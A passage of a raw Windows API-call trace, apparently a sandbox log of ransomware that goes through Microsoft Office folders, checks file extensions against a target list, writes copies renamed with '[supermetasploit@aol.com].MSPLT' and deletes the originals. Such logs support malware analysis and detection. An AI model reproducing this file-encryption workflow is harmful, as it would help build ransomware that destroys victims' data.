dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0316.697] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=21184) returned 1 [0316.699] CloseHandle (hObject=0x470) returned 1 [0316.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll")) returned 0x220 [0316.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0317.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.501] lstrlenW (lpString=".doc") returned 4 [0317.501] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.501] lstrlenW (lpString=".docx") returned 5 [0317.501] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0317.501] lstrlenW (lpString=".pdf") returned 4 [0317.501] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.501] lstrlenW (lpString=".xls") returned 4 [0317.501] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.501] lstrlenW (lpString=".xlsx") returned 5 [0317.501] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0317.501] lstrlenW (lpString=".ppt") returned 4 [0317.501] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.501] lstrlenW (lpString=".zip") returned 4 [0317.501] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.501] lstrlenW (lpString=".rar") returned 4 [0317.501] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.501] lstrlenW (lpString=".bz2") returned 4 [0317.502] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.502] lstrlenW (lpString=".7z") returned 3 [0317.502] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.502] lstrlenW (lpString=".dbf") returned 4 [0317.502] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.502] lstrlenW (lpString=".1cd") returned 4 [0317.502] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.502] lstrlenW (lpString=".jpg") returned 4 [0317.502] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.502] lstrlenW (lpString=".doc") returned 4 [0317.502] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.502] lstrlenW (lpString=".docx") returned 5 [0317.502] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0317.502] lstrlenW (lpString=".pdf") returned 4 [0317.502] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.502] lstrlenW (lpString=".xls") returned 4 [0317.502] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.502] lstrlenW (lpString=".xlsx") returned 5 [0317.502] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0317.502] lstrlenW (lpString=".ppt") returned 4 [0317.502] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.502] lstrlenW (lpString=".zip") returned 4 [0317.502] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.502] lstrlenW (lpString=".rar") returned 4 [0317.503] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.503] lstrlenW (lpString=".bz2") returned 4 [0317.503] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.503] lstrlenW (lpString=".7z") returned 3 [0317.503] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.503] lstrlenW (lpString=".dbf") returned 4 [0317.503] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.503] lstrlenW (lpString=".1cd") returned 4 [0317.503] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 76 [0317.503] lstrlenW (lpString=".jpg") returned 4 [0317.503] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.503] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0317.503] lstrlenW (lpString="msvcp140.dll") returned 12 [0317.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0317.871] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=635040) returned 1 [0317.871] CloseHandle (hObject=0x524) returned 1 [0317.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp140.dll")) returned 0x220 [0318.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp140.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0319.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.261] lstrlenW (lpString=".doc") returned 4 [0319.261] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0319.261] lstrlenW (lpString=".docx") returned 5 [0319.261] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0319.262] lstrlenW (lpString=".pdf") returned 4 [0319.262] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0319.262] lstrlenW (lpString=".xls") returned 4 [0319.262] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0319.262] lstrlenW (lpString=".xlsx") returned 5 [0319.262] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0319.262] lstrlenW (lpString=".ppt") returned 4 [0319.262] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0319.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.262] lstrlenW (lpString=".zip") returned 4 [0319.262] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0319.263] lstrlenW (lpString=".rar") returned 4 [0319.263] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0319.263] lstrlenW (lpString=".bz2") returned 4 [0319.263] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0319.263] lstrlenW (lpString=".7z") returned 3 [0319.263] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0319.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.263] lstrlenW (lpString=".dbf") returned 4 [0319.263] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0319.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.263] lstrlenW (lpString=".1cd") returned 4 [0319.263] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0319.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.263] lstrlenW (lpString=".jpg") returned 4 [0319.263] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0319.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.402] lstrlenW (lpString=".doc") returned 4 [0319.402] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0319.402] lstrlenW (lpString=".docx") returned 5 [0319.402] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0319.402] lstrlenW (lpString=".pdf") returned 4 [0319.402] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0319.402] lstrlenW (lpString=".xls") returned 4 [0319.403] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0319.403] lstrlenW (lpString=".xlsx") returned 5 [0319.404] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0319.404] lstrlenW (lpString=".ppt") returned 4 [0319.404] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0319.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.404] lstrlenW (lpString=".zip") returned 4 [0319.404] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0319.404] lstrlenW (lpString=".rar") returned 4 [0319.405] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0319.405] lstrlenW (lpString=".bz2") returned 4 [0319.405] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0319.405] lstrlenW (lpString=".7z") returned 3 [0319.405] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0319.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.405] lstrlenW (lpString=".dbf") returned 4 [0319.405] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0319.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.405] lstrlenW (lpString=".1cd") returned 4 [0319.405] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0319.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 58 [0319.405] lstrlenW (lpString=".jpg") returned 4 [0319.406] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0319.406] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.406] lstrlenW (lpString="GRDEN_01.MID") returned 12 [0319.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.409] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=7567) returned 1 [0319.410] CloseHandle (hObject=0x3b0) returned 1 [0319.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid")) returned 0x220 [0319.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.411] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.411] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.413] GetLastError () returned 0x0 [0319.413] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x1d8f, lpOverlapped=0x0) returned 1 [0319.439] WriteFile (in: hFile=0x534, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x1d90, lpOverlapped=0x0) returned 1 [0319.441] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.441] WriteFile (in: hFile=0x534, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.442] SetEndOfFile (hFile=0x534) returned 1 [0319.443] CloseHandle (hObject=0x534) returned 1 [0319.445] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.446] SetEndOfFile (hFile=0x3b0) returned 1 [0319.449] CloseHandle (hObject=0x3b0) returned 1 [0319.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.450] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid")) returned 1 [0319.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.451] lstrlenW (lpString=".doc") returned 4 [0319.451] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.451] lstrlenW (lpString=".docx") returned 5 [0319.451] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.451] lstrlenW (lpString=".pdf") returned 4 [0319.451] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.451] lstrlenW (lpString=".xls") returned 4 [0319.451] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.451] lstrlenW (lpString=".xlsx") returned 5 [0319.451] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.451] lstrlenW (lpString=".ppt") returned 4 [0319.452] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.452] lstrlenW (lpString=".zip") returned 4 [0319.452] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.452] lstrlenW (lpString=".rar") returned 4 [0319.452] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.452] lstrlenW (lpString=".bz2") returned 4 [0319.452] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.452] lstrlenW (lpString=".7z") returned 3 [0319.452] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.452] lstrlenW (lpString=".dbf") returned 4 [0319.452] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.452] lstrlenW (lpString=".1cd") returned 4 [0319.452] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.452] lstrlenW (lpString=".jpg") returned 4 [0319.452] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.452] lstrlenW (lpString=".doc") returned 4 [0319.452] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.452] lstrlenW (lpString=".docx") returned 5 [0319.453] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.453] lstrlenW (lpString=".pdf") returned 4 [0319.453] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.453] lstrlenW (lpString=".xls") returned 4 [0319.453] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.453] lstrlenW (lpString=".xlsx") returned 5 [0319.453] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.453] lstrlenW (lpString=".ppt") returned 4 [0319.453] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.453] lstrlenW (lpString=".zip") returned 4 [0319.453] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.453] lstrlenW (lpString=".rar") returned 4 [0319.453] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.453] lstrlenW (lpString=".bz2") returned 4 [0319.453] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.453] lstrlenW (lpString=".7z") returned 3 [0319.453] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.453] lstrlenW (lpString=".dbf") returned 4 [0319.453] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.453] lstrlenW (lpString=".1cd") returned 4 [0319.453] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 68 [0319.454] lstrlenW (lpString=".jpg") returned 4 [0319.454] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.454] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.454] lstrlenW (lpString="HTECH_01.MID") returned 12 [0319.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.456] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=7178) returned 1 [0319.456] CloseHandle (hObject=0x3b0) returned 1 [0319.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid")) returned 0x220 [0319.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.457] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.457] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0319.458] GetLastError () returned 0x0 [0319.458] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x1c0a, lpOverlapped=0x0) returned 1 [0319.473] WriteFile (in: hFile=0x488, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x1c10, lpOverlapped=0x0) returned 1 [0319.474] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.474] WriteFile (in: hFile=0x488, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.474] SetEndOfFile (hFile=0x488) returned 1 [0319.475] CloseHandle (hObject=0x488) returned 1 [0319.475] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.475] SetEndOfFile (hFile=0x3b0) returned 1 [0319.478] CloseHandle (hObject=0x3b0) returned 1 [0319.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.479] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid")) returned 1 [0319.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.480] lstrlenW (lpString=".doc") returned 4 [0319.480] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.480] lstrlenW (lpString=".docx") returned 5 [0319.480] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.480] lstrlenW (lpString=".pdf") returned 4 [0319.480] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.480] lstrlenW (lpString=".xls") returned 4 [0319.480] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.480] lstrlenW (lpString=".xlsx") returned 5 [0319.480] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.480] lstrlenW (lpString=".ppt") returned 4 [0319.480] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.480] lstrlenW (lpString=".zip") returned 4 [0319.480] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.480] lstrlenW (lpString=".rar") returned 4 [0319.480] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.481] lstrlenW (lpString=".bz2") returned 4 [0319.481] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.481] lstrlenW (lpString=".7z") returned 3 [0319.481] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.481] lstrlenW (lpString=".dbf") returned 4 [0319.481] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.481] lstrlenW (lpString=".1cd") returned 4 [0319.481] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.481] lstrlenW (lpString=".jpg") returned 4 [0319.481] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.481] lstrlenW (lpString="C:\\Program 